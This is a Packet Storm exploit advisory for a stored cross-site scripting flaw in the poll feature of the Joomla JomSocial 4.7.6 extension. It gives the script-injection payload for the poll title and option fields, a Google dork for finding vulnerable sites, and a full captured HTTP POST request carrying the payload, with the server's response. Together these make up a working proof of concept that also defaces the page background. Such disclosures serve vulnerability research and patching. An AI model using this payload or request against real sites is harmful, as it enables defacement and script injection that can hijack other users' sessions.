Joomla JomSocial 4.7.6 Cross Site Scripting

2020-11-03T00:00:00
ID PACKETSTORM:159804
Type packetstorm
Reporter Vincent666 ibn Winnie
Modified 2020-11-03T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla JomSocial 4.7.6 Stored XSS  
# Date: 03.11.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://www.jomsocial.com/demo  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox,Google Chrome and Edge  
#:Google Dorks: inurl:templates/jomsocial/  
# Blog : https://pentest.vincent.blogspot.com/  
# PoC: https://pentestvincent.blogspot.com/2020/11/joomla-jomsocial-476-stored-xss.html  
  
PoC:  
  
Stored XSS in the poll.  
  
Go to the https://ijoomlademo.com/index.php  
  
Create poll:  
  
Use for test simple xss code :  
  
""><script>alert(1)</script><script>alert("2")</script><body  
background="https://i.gifer.com/Nv2.gif">  
  
Field "title and field "add poll option".  
  
Update this and we have stored xss and deface background with stored  
html code injection.  
  
https://ijoomlademo.com/index.php  
  
Host: ijoomlademo.com  
  
..........................................................................................  
  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)  
Gecko/20100101 Firefox/82.0  
  
Accept: application/json, text/javascript, */*; q=0.01  
  
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
  
X-Requested-With: XMLHttpRequest  
  
Content-Length: 1073  
  
Origin: https://ijoomlademo.com  
  
Connection: keep-alive  
  
Referer: https://ijoomlademo.com/index.php  
  
Cookie: __cfduid=dee102cc0e40cf95be92c643956e474cd1604428425;  
4681557252fe8ff3df4a28d60cb41dc7=shg4g73pm6odh4e8hfuc4c2h75;  
currentURI=https%3A%2F%2Fijoomlademo.com%2Findex.php%3Foption%3Dcom_community%26view%3Dfriends%26task%3DajaxAutocomplete%26allfriends%3D1;  
joomla_user_state=logged_in  
  
option=community&view=frontpage&task=azrul_ajax&func=system,ajaxStreamAdd&no_html=1&008b85046025db389f11292741ac0393=1&arg2=["_d_","""><script>alert(1)</script>"]&arg3=["_d_","{"element":"profile","target":"231","type":"poll","options":["1","2"],"settings":{"allow_multiple":false},"polltime":{"enddate":["2020-11-03","3  
November 2020"],"endtime":["00:00","12:00  
AM"]},"privacy":10,"catid":1}"]&arg4=["_d_","{"filter":"","value":"default_value","hashtag":false}"]  
  
POST: HTTP/2.0 200 OK  
  
date: Tue, 03 Nov 2020 18:53:21 GMT  
  
content-type: text/plain;charset=UTF-8  
  
x-powered-by: PHP/7.2.33  
  
cf-cache-status: DYNAMIC  
  
cf-request-id: 06310dee9f000033744f1b3000000001  
  
expect-ct: max-age=604800,  
report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
  
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=b7CGOI6icRSPny5RypHkJ%2FP%2FfGPQbpAPZalJMzkV6a3yQZwqkqb8tFcZcMnuQNZM45YxUCbr5ZrvHryA0tsZ2qv3NT%2Bh04xxtHJhrpFmcDY%3D"}],"group":"cf-nel","max_age":604800}  
  
nel: {"report_to":"cf-nel","max_age":604800}  
  
server: cloudflare  
  
cf-ray: 5ec84c2a9fd33374-DME  
  
content-encoding: br  
  
X-Firefox-Spdy: h2  
  
..........................................................................................  
  
Picture:  
  
https://imgur.com/a/Cmrcker  
  
https://imgur.com/a/82FhgbW  
  
https://imgur.com/a/mc7bgkN  
  
Video:  
  
https://www.youtube.com/watch?v=brmf-Ew4D3k&feature=youtu.be  
`